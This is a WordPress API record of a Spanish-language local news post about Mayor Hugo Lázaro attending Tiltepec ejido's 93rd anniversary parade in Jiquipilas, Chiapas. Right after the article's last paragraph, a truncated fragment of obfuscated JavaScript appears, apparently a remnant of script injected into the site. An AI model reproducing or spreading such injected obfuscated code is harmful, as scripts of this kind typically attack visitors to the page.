{"id":7924,"date":"2023-01-09T04:22:15","date_gmt":"2023-01-09T04:22:15","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7924"},"modified":"2023-01-09T04:22:16","modified_gmt":"2023-01-09T04:22:16","slug":"hugo-lazaro-felicito-a-los-habitantes-del-ejido-tiltepec-por-celebrar-el-93-aniversario-de-fundacion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7924","title":{"rendered":"Hugo L\u00e1zaro felicit\u00f3 a los habitantes del ejido Tiltepec por celebrar el 93 Aniversario de Fundaci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230108-WA0050.jpg\" alt=\"\" class=\"wp-image-7925\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230108-WA0050.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230108-WA0050-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230108-WA0050-768x512.jpg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 El Alclade recibi\u00f3 reconocimientos de las autoridades ejidales y la junta de festejos por apoyarlos en los proyectos de desarrollo y para los festejos de feria.<\/p>\n\n\n\n<p>\u2022 Refrend\u00f3 el compromiso del Gobierno Municipal para seguir Impulsando acciones de desarrollo en Tiltepec.<\/p>\n\n\n\n<p>Jiquipilas, Chiapas. &#8211; En el Marco del 93 Aniversario de la Fundaci\u00f3n del ejido Tiltepec el Alcalde Hugo L\u00e1zaro Rodr\u00edguez particip\u00f3 en el tradicional desfile con ejidatarios y pobladores recorriendo las principales calles de esta comunidad donde se desbord\u00f3 la alegr\u00eda.<\/p>\n\n\n\n<p>El Edil salud\u00f3 a todos los asistentes, al tiempo que comparti\u00f3 la felicidad por la celebraci\u00f3n de la feria en este ejido que se ha distinguido por ser unido y progresista.<\/p>\n\n\n\n<p>Al final del desfile donde tambi\u00e9n participaron diferentes escuelas de la comunidad, se llev\u00f3 a cabo una actividad art\u00edstica cultural en la plaza central, donde las autoridades ejidales entregaron reconocimientos al Alcalde Hugo L\u00e1zaro por apoyarlos en sus proyectos de desarrollo y por brindarles respaldo para celebraci\u00f3n de la feria.<\/p>\n\n\n\n<p>Las damas voluntarias del ejido que forman parte de la organizaci\u00f3n de la feria de fundaci\u00f3n, reconocieron las acciones del Presidente Municipal, lo que se ha traducido en mayor bienestar social.<\/p>\n\n\n\n<p>Hugo L\u00e1zaro, al hacer uso de la palabra destac\u00f3 la felicitaci\u00f3n a todos los ejidatarios y pobladores de Tiltepec, a quienes les reconoci\u00f3 su \u00edmpetu de trabajo y organizaci\u00f3n en bien de su gente.<\/p>\n\n\n\n<p>&#8220;Amigos y amigas de Tiltepec hoy me congratula estar con ustedes festejando el 93 aniversario y por ello quiero refrendarles que tienen todo nuestro apoyo desde el Ayuntamiento&#8221;, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>Por \u00faltimo reconoci\u00f3 el arduo trabajo y dedicaci\u00f3n de las y los integrantes de la junta de festejos por lograr una feria de mucho \u00e9xito, agradeci\u00f3 al mismo tiempo el c\u00e1lido recibimiento que le brindaron a su llegada al ejido, concluy\u00f3<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 El Alclade recibi\u00f3 reconocimientos de las autoridades ejidales y la junta de festejos por apoyarlos en los proyectos de desarrollo y para los festejos de feria. \u2022 Refrend\u00f3 el compromiso del Gobierno Municipal para seguir Impulsando acciones de desarrollo en Tiltepec. Jiquipilas, Chiapas. &#8211; En el Marco del 93 Aniversario de la Fundaci\u00f3n del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7925,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7924","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7924","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7924"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7924\/revisions"}],"predecessor-version":[{"id":7926,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7924\/revisions\/7926"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7925"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7924"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7924"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7924"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}